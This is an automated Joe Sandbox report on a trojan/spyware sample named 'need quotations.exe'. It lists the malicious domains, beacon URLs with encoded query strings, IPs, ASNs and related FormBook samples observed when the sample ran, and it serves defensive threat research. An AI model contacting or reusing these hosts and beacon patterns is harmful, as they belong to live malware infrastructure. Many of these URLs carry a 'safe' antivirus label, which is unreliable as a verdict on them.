https://www.hover.com/domain_pricing?source=parked	0%	Avira URL Cloud	safe
https://www.hover.com/tools?source=parked	0%	Avira URL Cloud	safe
https://help.hover.com/home?source=parked	0%	Avira URL Cloud	safe
https://www.hover.com/privacy?source=parked	0%	Avira URL Cloud	safe
http://www.43kdd.top/bsyy/?Lhx=fPAh7htHyFPl-&xDq=w9Wsyrfddra1GxcX7luKIP81eOoQqUt/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVtzbO2HWO/vlwyzXb4OCTu0u4SZtJF3c1HS4=	0%	Avira URL Cloud	safe
https://www.hover.com/transfer_in?source=parked	0%	Avira URL Cloud	safe
http://www.rysanekbeton.cloud/3g99/	0%	Avira URL Cloud	safe
http://www.soainsaat.xyz	0%	Avira URL Cloud	safe
http://www.soainsaat.xyz/gqm1/?xDq=VH76hcmRMgeprQ8IT+3GxX+TS5+dQO04AZO3l+okmzs3WMxErCusHenX7YpJhZ4NLCcONUUw+VEfVDncTohff+sgqvxsooslXq9NnGhH6p7WeG8ES6Jz9FQ=&Lhx=fPAh7htHyFPl-	0%	Avira URL Cloud	safe
http://www.nb-shenshi.buzz/1mwk/	0%	Avira URL Cloud	safe
http://www.rysanekbeton.cloud/3g99/?xDq=RytNeZ1XRv60mT66OsZ14/Z53Dl0UWWckwx6IFoxcwMb7EGpIrhq/2Ikbe8axKxY7FzhI3ANlUXRki/bAaSaeyuYJYNKRROQR84NXiU2Qicm7Q5G8aT8zzM=&Lhx=fPAh7htHyFPl-	0%	Avira URL Cloud	safe
http://www.egldfi.xyz/3e55/?xDq=e7cut+sq+gjH7SJUS4xdyYo0p6mJ9qAA0wzN+9ruW+EOQxiCPnXfmi7SN89EF+kZU43+kk4LMIz3TDJAmTe52w+EUUdZ4J96HyImgVvdykY8ajmm995qykg=&Lhx=fPAh7htHyFPl-	0%	Avira URL Cloud	safe
http://www.rafconstrutora.online/0xli/	0%	Avira URL Cloud	safe
https://www.hover.com/renew?source=parked	0%	Avira URL Cloud	safe
http://www.jalan2.online/lvda/	0%	Avira URL Cloud	safe
http://www.43kdd.top/bsyy/	0%	Avira URL Cloud	safe
http://www.rtpwslot888gol.sbs/jmkz/?xDq=2/h6on3i5cEqQ5is+ICgXmY2AkJVcLKq2EbSJtEbgpp6+wmMOVJuzUCOWh5aW8O1XJ0bOuSOAqNryZfPUVNa+soYNjAnpoeEkPK1vyRK5nou96mjQ4WwK9s=&Lhx=fPAh7htHyFPl-	0%	Avira URL Cloud	safe
http://www.betmatchx.online/bnd1/?xDq=+qUIBb8n1ABDtnrHN8NtG8V6LcaZfiG0FDsVLWxlL8URstOMchGUJI+QLzGyTcFWCZ2pjKgvok0jKnOQP4P3BCUAJ4DrLeDFBH9H9m1GLjfoWl8bX0C0KxM=&Lhx=fPAh7htHyFPl-	0%	Avira URL Cloud	safe
https://www.hostgator.com.br	0%	Avira URL Cloud	safe
http://www.prototype.garden/mjdo/	0%	Avira URL Cloud	safe
https://www.hover.com/tos?source=parked	0%	Avira URL Cloud	safe
http://www.soainsaat.xyz/gqm1/	0%	Avira URL Cloud	safe
https://www.hover.com/?source=parked	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.lgdiamonds.info	130.185.109.77	true	false	unknown
www.trendave.xyz	203.161.42.73	true	true	unknown
43kdd.top	38.47.232.202	true	false	unknown
www.rafconstrutora.online	188.114.96.3	true	false	unknown
www.rtpwslot888gol.sbs	188.114.96.3	true	false	unknown
www.bcg.services	199.59.243.227	true	false	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.127358.win	206.238.89.119	true	false	unknown
www.egldfi.xyz	13.248.169.48	true	true	unknown
jalan2.online	108.181.189.7	true	false	unknown
www.betmatchx.online	91.206.201.136	true	false	unknown
gtml.huksa.huhusddfnsuegcdn.com	23.167.152.41	true	false	high
www.nb-shenshi.buzz	161.97.168.245	true	false	unknown
rysanekbeton.cloud	81.2.196.19	true	false	unknown
www.prototype.garden	216.40.34.41	true	false	unknown
www.43kdd.top	unknown	unknown	false	unknown
www.rysanekbeton.cloud	unknown	unknown	false	unknown
www.soainsaat.xyz	unknown	unknown	true	unknown
www.75178.club	unknown	unknown	false	unknown
www.jalan2.online	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.127358.win/qn33/	false	Avira URL Cloud: safe	unknown
http://www.bcg.services/5onp/?xDq=YQtAzQFhELh+NSSrGqCNnhce8BNGqUHm8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+UQeEteLMn8uXkqbvRDHjk1GU4HyortJJJ3Q=&Lhx=fPAh7htHyFPl-	false	Avira URL Cloud: safe	unknown
http://www.bcg.services/5onp/	false	Avira URL Cloud: safe	unknown
http://www.127358.win/qn33/?xDq=99NzBUOu8EtmiwHLkwkwM6CtLEWWEZ390ZejPygVUj3ypAzbuWBUlAjLLmpNciJuv0EF7eUmh88cLf0Gn8IRd668KNerATnE+FhfiYpUJ+CuKGzT26uc/xk=&Lhx=fPAh7htHyFPl-	false	Avira URL Cloud: safe	unknown
http://www.egldfi.xyz/3e55/	false	Avira URL Cloud: safe	unknown
http://www.trendave.xyz/nhcb/?xDq=Jt/EBXmNn0Xont3Uq3SrNJmrJY3M4cpFu0H2rr3BW2spn453uaHrewE12DuyPcurf4Mzbuz0WqMTaNbmObgJIgyyiHGSgJZQh0vowHWBwbWi8nXeO4OBSJo=&Lhx=fPAh7htHyFPl-	false	Avira URL Cloud: safe	unknown
http://www.rtpwslot888gol.sbs/jmkz/	false	Avira URL Cloud: safe	unknown
http://www.lgdiamonds.info/cv1w/	false	Avira URL Cloud: safe	unknown
http://www.lgdiamonds.info/cv1w/?xDq=KIRaABhBgujzn3KVjNCYdeU2jI4CiDZHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDesRP/SoiJcG7UzeyTKHH5ghDsthQpYxENiFA=&Lhx=fPAh7htHyFPl-	false	Avira URL Cloud: safe	unknown
http://www.trendave.xyz/nhcb/	false	Avira URL Cloud: safe	unknown
http://www.jalan2.online/lvda/?Lhx=fPAh7htHyFPl-&xDq=ELDSXX2RsHX+gMhA2PfNyBEKowNIoqU7uMJ0P3epR9C3wBGcH3Oc/iCy84j3rr0M4JJUpyIPXVKNA8OpCuWYmMQdGJQpdXCyyNvs5R5nS90nKpkFpzjMZ1A=	false	Avira URL Cloud: safe	unknown
http://www.rafconstrutora.online/0xli/?xDq=fiwXgneLShVjQCrL4aAUmgr67nbTTs+FPQo9HslC8d9LCicIVxdgVPkWu4N9YPZNTEC7g2Z77mR61ZpsKE291b6+nh6+OhPQfROIutba2cindDDWBeD84Ws=&Lhx=fPAh7htHyFPl-	false	Avira URL Cloud: safe	unknown
http://www.75178.club/vl4d/?xDq=QHNq3VljPHXHL8Z+m/91IyVktX2l1Liqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym2iV1w40c0QsDnhpOyo2cx9iWMgjuEVKoVLw=&Lhx=fPAh7htHyFPl-	false	Avira URL Cloud: safe	unknown
http://www.betmatchx.online/bnd1/	false	Avira URL Cloud: safe	unknown
http://www.43kdd.top/bsyy/?Lhx=fPAh7htHyFPl-&xDq=w9Wsyrfddra1GxcX7luKIP81eOoQqUt/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVtzbO2HWO/vlwyzXb4OCTu0u4SZtJF3c1HS4=	false	Avira URL Cloud: safe	unknown
http://www.soainsaat.xyz/gqm1/?xDq=VH76hcmRMgeprQ8IT+3GxX+TS5+dQO04AZO3l+okmzs3WMxErCusHenX7YpJhZ4NLCcONUUw+VEfVDncTohff+sgqvxsooslXq9NnGhH6p7WeG8ES6Jz9FQ=&Lhx=fPAh7htHyFPl-	false	Avira URL Cloud: safe	unknown
http://www.nb-shenshi.buzz/1mwk/	false	Avira URL Cloud: safe	unknown
http://www.rysanekbeton.cloud/3g99/	false	Avira URL Cloud: safe	unknown
http://www.egldfi.xyz/3e55/?xDq=e7cut+sq+gjH7SJUS4xdyYo0p6mJ9qAA0wzN+9ruW+EOQxiCPnXfmi7SN89EF+kZU43+kk4LMIz3TDJAmTe52w+EUUdZ4J96HyImgVvdykY8ajmm995qykg=&Lhx=fPAh7htHyFPl-	false	Avira URL Cloud: safe	unknown
http://www.rafconstrutora.online/0xli/	false	Avira URL Cloud: safe	unknown
http://www.rysanekbeton.cloud/3g99/?xDq=RytNeZ1XRv60mT66OsZ14/Z53Dl0UWWckwx6IFoxcwMb7EGpIrhq/2Ikbe8axKxY7FzhI3ANlUXRki/bAaSaeyuYJYNKRROQR84NXiU2Qicm7Q5G8aT8zzM=&Lhx=fPAh7htHyFPl-	false	Avira URL Cloud: safe	unknown
http://www.43kdd.top/bsyy/	false	Avira URL Cloud: safe	unknown
http://www.jalan2.online/lvda/	false	Avira URL Cloud: safe	unknown
http://www.rtpwslot888gol.sbs/jmkz/?xDq=2/h6on3i5cEqQ5is+ICgXmY2AkJVcLKq2EbSJtEbgpp6+wmMOVJuzUCOWh5aW8O1XJ0bOuSOAqNryZfPUVNa+soYNjAnpoeEkPK1vyRK5nou96mjQ4WwK9s=&Lhx=fPAh7htHyFPl-	false	Avira URL Cloud: safe	unknown
http://www.prototype.garden/mjdo/	false	Avira URL Cloud: safe	unknown
http://www.betmatchx.online/bnd1/?xDq=+qUIBb8n1ABDtnrHN8NtG8V6LcaZfiG0FDsVLWxlL8URstOMchGUJI+QLzGyTcFWCZ2pjKgvok0jKnOQP4P3BCUAJ4DrLeDFBH9H9m1GLjfoWl8bX0C0KxM=&Lhx=fPAh7htHyFPl-	false	Avira URL Cloud: safe	unknown
http://www.soainsaat.xyz/gqm1/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.instagram.com/hover_domains	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.hover.com/email?source=parked	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/about?source=parked	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000004B86000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.00000000059F6000.00000004.10000000.00040000.00000000.sdmp	false		high
https://www.hover.com/domains/results	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://adm.tools/?page=5	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000004EAA000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.00000000054F2000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006362000.00000004.10000000.00040000.00000000.sdmp	false		high
https://www.hover.com/tools?source=parked	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.hover.com/home?source=parked	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/domain_pricing?source=parked	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/privacy?source=parked	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://twitter.com/hover	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.soainsaat.xyz	hyAHqPRvnfCBI.exe, 00000005.00000002.4145847136.0000000006AA3000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/transfer_in?source=parked	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hover.com/renew?source=parked	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.hover.com/tos?source=parked	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hostgator.com.br	hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.00000000059A8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006818000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.hover.com/?source=parked	rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
130.185.109.77	www.lgdiamonds.info	Germany	51191	XIRRADE	false
13.248.169.48	www.egldfi.xyz	United States	16509	AMAZON-02US	true
199.59.243.227	www.bcg.services	United States	395082	BODIS-NJUS	false
81.2.196.19	rysanekbeton.cloud	Czech Republic	24806	INTERNET-CZKtis238403KtisCZ	false
38.47.232.202	43kdd.top	United States	174	COGENT-174US	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
206.238.89.119	www.127358.win	United States	174	COGENT-174US	false
91.206.201.136	www.betmatchx.online	Ukraine	200000	UKRAINE-ASUA	false
203.161.42.73	www.trendave.xyz	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
23.167.152.41	gtml.huksa.huhusddfnsuegcdn.com	Reserved	395774	ESVC-ASNUS	false
108.181.189.7	jalan2.online	Canada	852	ASN852CA	false
188.114.96.3	www.rafconstrutora.online	European Union	13335	CLOUDFLARENETUS	false
161.97.168.245	www.nb-shenshi.buzz	United States	51167	CONTABODE	false
216.40.34.41	www.prototype.garden	Canada	15348	TUCOWSCA	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1559030
Start date and time:	2024-11-20 04:17:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	need quotations.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@16/14
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 50 Number of non-executed functions: 299
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
22:19:05	API Interceptor	10630232x Sleep call for process: rasdial.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
130.185.109.77	MaMsKRmgXZ.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.holzleisten24.shop/ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP
	Product24573.exe	Get hash	malicious	FormBook	Browse	www.berlinhealthweek.com/bpg5/?ti-8=LyKdFPBKAe5W&5eb6=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA==
	Siirtokuitti_006703.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.printmyride.store/tchg/?O0qEM=QQ6dpIpAk027UR3BL5U7sG0DxH6sKQa5YnzY0agrXpda3w5URJfAhsqjtJqbY2/M8fhrkTh6mIV7dbZQ8z6SYrdm6JILdk9Mfg==&CF1Ki=UnDuQcdCFs1MNsvY
	P5348574_74676.exe	Get hash	malicious	FormBook	Browse	www.berlinhealthweek.com/bpg5/?lpw7=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==&UZCu=zJfEuRXw-P
	535276_86376.exe	Get hash	malicious	FormBook	Browse	www.berlinhealthweek.com/bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZm
	Product_List.exe	Get hash	malicious	FormBook	Browse	www.berlinhealthweek.com/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==
	PS_231.exe	Get hash	malicious	FormBook	Browse	www.berlinhealthweek.com/bpg5/?kyx=IT_WJ&HqE8Cy=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA==
	KD_MEDICAL_POLSKA_23053371.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.die-cyber-versicherer.com/co9t/?LVuSGU=-giyq0&MGuik=O0wiA489QXAo4/zisxW0kKpRL90vV9sT3USeBzF+d48ZKZIeaBWCTOAUxMvYVu20Q54TxHeRRe+2rSLSyytqRGlmgBV+voPflw==
	s4YvlK74zJ.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.die-cyber-versicherer.com/co9t/?h1=O0wiA489QXAo4/zisxW0kKpRL90vV9sT3USeBzF+d48ZKZIeaBWCTOAUxMvYVu20Q54TxHeRRe+2rSLSyytqRGlmgBV+voPflw==&m8hK_F=yFTUihtd4y
	24Hdkz2sGxG1Xq0.exe	Get hash	malicious	FormBook	Browse	www.berlinhealthweek.com/bpg5/?Bjk=Fjw7NbIMlZ8ijMXD&67FoqNQb=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==
13.248.169.48	Quotation request -30112024_pdf.exe	Get hash	malicious	FormBook	Browse	www.tals.xyz/010v/
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	www.wajf.net/dkz5/
	rG5EzfUhUp.exe	Get hash	malicious	Sakula RAT	Browse	www.polarroute.com/newimage.asp?imageid=zcddwc1730788541&type=0&resid=5322796
	dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe	Get hash	malicious	FormBook	Browse	www.extrem.tech/ikn1/
	Hire P.O.exe	Get hash	malicious	FormBook	Browse	www.sonoscan.org/ew98/
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.hopeisa.live/v0jl/
	DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exe	Get hash	malicious	FormBook	Browse	www.layerzero.cfd/8f5m/
	rGO880-PDF.exe	Get hash	malicious	FormBook	Browse	www.reviewpro.shop/aclh/
	FOTO#U011eRAFLAR.exe	Get hash	malicious	FormBook	Browse	www.fitlook.shop/34uy/
	Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	FormBook	Browse	www.dreampay.shop/a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.rtpwslot888gol.sbs	Item-RQF-9456786.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
gtml.huksa.huhusddfnsuegcdn.com	rGO880-PDF.exe	Get hash	malicious	FormBook	Browse	206.119.185.138
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	206.119.185.141
	Maryam Farokhi-PhD- CV-1403.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	NIlfETZ9aE.exe	Get hash	malicious	FormBook	Browse	206.119.185.226
	s200ld6btf.exe	Get hash	malicious	FormBook	Browse	206.119.185.225
	MV Sunshine.exe	Get hash	malicious	FormBook	Browse	206.119.185.225
	dzkb5Gfd33.exe	Get hash	malicious	FormBook	Browse	206.119.185.189
	Nowe zam#U00f3wienie zakupu pdf.exe	Get hash	malicious	FormBook	Browse	206.119.185.165
	Pedido de Cota#U00e7#U00e3o - RFQ 31072024_Lista comercial.bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.41.37.250
	Pedido de Cota#U00e7#U00e3o - RFQ 31072024_Lista comercial.bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.41.37.243
natroredirect.natrocdn.com	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	RvJVMsNLJI.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Certificate 64411-18.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Certificate 11-17.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Certificate 11-142024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Hire P.O.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	rDocument11-142024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	rGO880-PDF.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Order.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
www.bcg.services	PO-DC13112024_pdf.vbs	Get hash	malicious	Unknown	Browse	199.59.243.227

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	https://atpscan.global.hornetsecurity.com/?d=zgarMAzqF8gJdiyz7BRUZX8-Kt1RoHrhrMmKtaU9kW8&f=VhLn9tqiibnSyqWDnEopjApZtye8WgAc5bwx7BMFWiKwqjA1EcPjZyfvoQy11klP&i=&k=QQhP&m=0jL9ajZ_jxYnMJb2yb4luNRYQCXy24RTS6RPwUyZoAcuBVX0kzGA69aOJSo0d2htwIsi238bOVH3h3HqrhJGfzTuFk7GTjJWYsgIrocXphf5x2p4nZ7S2EABjAck31fG&n=TU5FjsulXTMv8aeSlx257utLr9bUpfdm0dDB4GNEHfOuhOvtIOr62mZHw3PXGZeG&r=qntyoaxGftDLRu_wopiK2t_EdeZaeg9mP15ZZI-qDen_3s7cQ10pAlhKQQnYAIUX&s=c4a8f5ec353e41b8b414bdcf47b33dd5d6b52b0394e0e4a09cc54527f49761c3&u=https%3A%2F%2Fthe1oomisagency.com%2Fthyu%2F	Get hash	malicious	Unknown	Browse	108.138.7.92
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	13.125.93.51
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	185.143.18.152
	IGxModz.arm7.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	IGxModz.arm6.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	i586.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	sh4.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	m68k.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	13.32.110.123
	NTS_eTaxInvoice.html	Get hash	malicious	Unknown	Browse	3.160.150.2
BODIS-NJUS	Order No 24.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	http://inscrit.es/	Get hash	malicious	Unknown	Browse	199.59.243.205
	http://inscrit.es/	Get hash	malicious	Unknown	Browse	199.59.243.205
	BlgAsBdkiD.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	RFQ.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	PO-DC13112024_pdf.vbs	Get hash	malicious	Unknown	Browse	199.59.243.227
	statement of accounts.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
